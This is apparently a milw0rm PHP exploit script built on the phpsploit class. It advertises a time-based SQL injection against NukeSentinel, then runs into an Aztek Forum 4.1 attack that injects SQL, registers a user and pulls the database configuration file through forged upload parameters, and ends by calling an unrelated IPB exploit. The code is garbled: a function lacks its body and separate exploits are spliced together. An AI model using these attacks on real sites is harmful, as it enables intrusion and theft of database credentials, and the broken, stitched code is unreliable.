<?php
error_reporting(E_ALL ^ E_NOTICE);
if ($argc < 3) {
print "\n-- NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit ---\n-----------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url <> [Options]\n Params: -url For example http://victim.com/phpnuke/ \nOptions: -prefix Table prefix (default=nuke)\n -debug Debug mod activated (debug_ns.html)\n -truetime Server response time which returns true\n -benchmark You can change the value used in benchmark()\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/phpnuke/ -debug\n Note: This exploit is based on the server response time\n If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
exit(1);
}
$url = getparam("url", 1);
$tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke';
$debug = getparam("debug") != "" ? 1 : 0;
$benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000';
$proxy = getparam("proxy");
$proxyauth = getparam("proxyauth");
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
$xpl->proxy($proxy);
}
if ($proxyauth) {
$xpl->proxyauth($proxyauth);
}
if ($debug) {
debug(1);
}
print "\nUsername: "******"\nPassword: ";
bruteforce('pwd');
exit(0);
function bruteforce($field)
if (!empty($prs)) {
$xpl->proxy($prs);
}
if (!empty($pra)) {
$xpl->proxyauth($pra);
}
print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ==================================================";
if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) {
print "\nsploit> Owner -> " . $matches[1];
} else {
die("\nsploit> Exploit failed");
}
$owner = $matches[1];
print "\nstatus> Trying to register a new user";
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$name = "phpsploit" . rand();
$xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on");
print "\nsploit> Login/Password -> {$name}";
print "\nstatus> Trying to get database informations";
$xpl->get($url . "forum.php?fid=XD");
if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) {
print "\nsploit> Full Path Disclosure -> " . $matches[1];
} else {
print "\nsploit> Failed";
}
$wanted = str_replace("forum/load.php", "common/bddconf.php", $matches[1]);
if (!empty($wanted)) {
$xpl->get($url . "index.php?owner={$owner}&action=profile&_SERVER[email]={$name}%40hotmail.coum&_FILES[upload][tmp_name]={$wanted}&_FILES[upload][name]=0123456789&_FILES[upload][type]=jpg");
$xpl->get($url . "index.php?owner={$owner}&choix=3");
* @example $this->reset()
*
*/
function reset($func = '')
{
switch ($func) {
case 'header':
$this->header = array();
break;
case 'cookie':
$this->cookie = array();
break;
default:
$this->cookiejar = '';
$this->header = array();
$this->cookie = array();
$this->allowredirection = '';
break;
}
}
}
$web = new phpsploit();
$web->cookiejar(1);
$web->agent('Mozilla Firefox');
$ipb = new ipb_spl();
$ipb->web =& $web;
$ipb->main();
?>
# milw0rm.com [2008-08-29]
